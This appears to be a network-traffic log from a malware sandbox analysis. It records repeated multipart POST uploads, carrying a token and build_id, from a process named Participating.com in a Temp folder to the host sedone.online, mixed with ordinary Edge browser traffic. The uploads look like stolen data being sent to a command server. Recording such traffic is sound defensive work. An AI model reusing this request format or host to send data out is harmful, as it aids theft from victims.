2024-12-16 12:47:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49743 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:08 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:08 UTC | 16355 | OUT | Data Ascii:
------V3WLNGD26F3EU3W4O8GV
Content-Disposition: form-data; name="token"

fe74653fe5362dc417272058eafcad35
------V3WLNGD26F3EU3W4O8GV
Content-Disposition: form-data; name="build_id"

294acdd3f4c6dd4a258e9798170c0159
------V3WLNGD26F3EU3W4O8GV
Cont
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:09 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                15192.168.2.849744116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 493
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:09 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------V3WLNGD26F3EU3W4O8GVCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:09 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                16192.168.2.849759116.203.12.1144437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:15 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----SR1DBSJMYMYM7QI5FCJM
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 3165
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:15 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------SR1DBSJMYMYM7QI5FCJMContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------SR1DBSJMYMYM7QI5FCJMContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------SR1DBSJMYMYM7QI5FCJMCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:16 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                17192.168.2.849768116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EC2N7Q9Z58YMYU37GVSR
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 207993
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 4e 37 51 39 5a 35 38 59 4d 59 55 33 37 47 56 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------EC2N7Q9Z58YMYU37GVSRContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------EC2N7Q9Z58YMYU37GVSRContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------EC2N7Q9Z58YMYU37GVSRCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 12:47:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49782 | 172.64.41.3 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-16 12:47:17 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 16 Dec 2024 12:47:17 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f2ec7f7c8a04271-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49773 | 172.64.41.3 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-16 12:47:17 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 16 Dec 2024 12:47:17 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f2ec7f7f939c34e-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49783 | 172.64.41.3 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-16 12:47:17 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 16 Dec 2024 12:47:17 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f2ec7f7fa19330c-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49785 | 172.64.41.3 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49786 | 172.64.41.3 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49787 | 172.64.41.3 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49775 | 172.217.19.225 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:18 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-16 12:47:18 UTC | 563 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC63VOvQiPFpJWwc9IcQDmFYDJbx2ZYKPk_7CoPD8sbhxpQYBVt93n1xgAFt1IxysaIT
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Sun, 15 Dec 2024 15:58:14 GMT
Expires: Mon, 15 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 74944
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49789 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:19 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2VSJ5XLFCBIE3E3WLFK6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:19 UTC | 16355 | OUT | Data Ascii:
------2VSJ5XLFCBIE3E3WLFK6
Content-Disposition: form-data; name="token"

fe74653fe5362dc417272058eafcad35
------2VSJ5XLFCBIE3E3WLFK6
Content-Disposition: form-data; name="build_id"

294acdd3f4c6dd4a258e9798170c0159
------2VSJ5XLFCBIE3E3WLFK6
Cont
2024-12-16 12:47:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49805 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:21 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----79RQ1NOHDJMYMYU3ECBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:21 UTC | 16355 | OUT | Data Ascii:
------79RQ1NOHDJMYMYU3ECBA
Content-Disposition: form-data; name="token"

fe74653fe5362dc417272058eafcad35
------79RQ1NOHDJMYMYU3ECBA
Content-Disposition: form-data; name="build_id"

294acdd3f4c6dd4a258e9798170c0159
------79RQ1NOHDJMYMYU3ECBA
Cont
2024-12-16 12:47:23 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49816 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:22 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----F3OZCT0ZMOZM7Y5P8Y5F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:22 UTC | 16355 | OUT | Data Ascii: ------F3OZCT0ZMOZM7Y5P8Y5FContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------F3OZCT0ZMOZM7Y5P8Y5FContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------F3OZCT0ZMOZM7Y5P8Y5FCont
2024-12-16 12:47:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49811 | 23.200.88.31 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:24 UTC | 751 | OUT | GET /statics/icons/favicon_newtabpage.png HTTP/1.1
Host: assets.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
2024-12-16 12:47:25 UTC | 1004 | IN | HTTP/1.1 200 OK
Content-Type: image/png
ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
Server: AkamaiNetStorage
Date: Mon, 16 Dec 2024 12:47:25 GMT
Content-Length: 354
Connection: close
Alt-Svc: h3=":443"; ma=86400
Akamai-Request-BC: [a=23.200.89.140,b=345410735,c=g,n=US_NJ_SECAUCUS,o=20940]
Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
Akamai-Cache-Status: Hit from child
Akamai-Server-IP: 23.200.89.140
Akamai-Request-ID: 14968caf
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                Akamai-GRN: 0.8c59c817.1734353245.14968caf
                                                                                                                                                                                                                                                                Vary: Origin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49826 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:25 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAA1NGVKNGV37Y58Q9RI
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 131557
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:47:25 UTC | 16355 | OUT | Data Ascii:
------AAA1NGVKNGV37Y58Q9RI
Content-Disposition: form-data; name="token"

fe74653fe5362dc417272058eafcad35
------AAA1NGVKNGV37Y58Q9RI
Content-Disposition: form-data; name="build_id"

294acdd3f4c6dd4a258e9798170c0159
------AAA1NGVKNGV37Y58Q9RI
Cont
2024-12-16 12:47:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:26 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:47:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49830 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:26 UTC | 329 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECB16X479H47QQ1N7G4O
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 6990993
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:47:26 UTC | 16355 | OUT | Data Ascii:
------ECB16X479H47QQ1N7G4O
Content-Disposition: form-data; name="token"

fe74653fe5362dc417272058eafcad35
------ECB16X479H47QQ1N7G4O
Content-Disposition: form-data; name="build_id"

294acdd3f4c6dd4a258e9798170c0159
------ECB16X479H47QQ1N7G4O
Cont
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
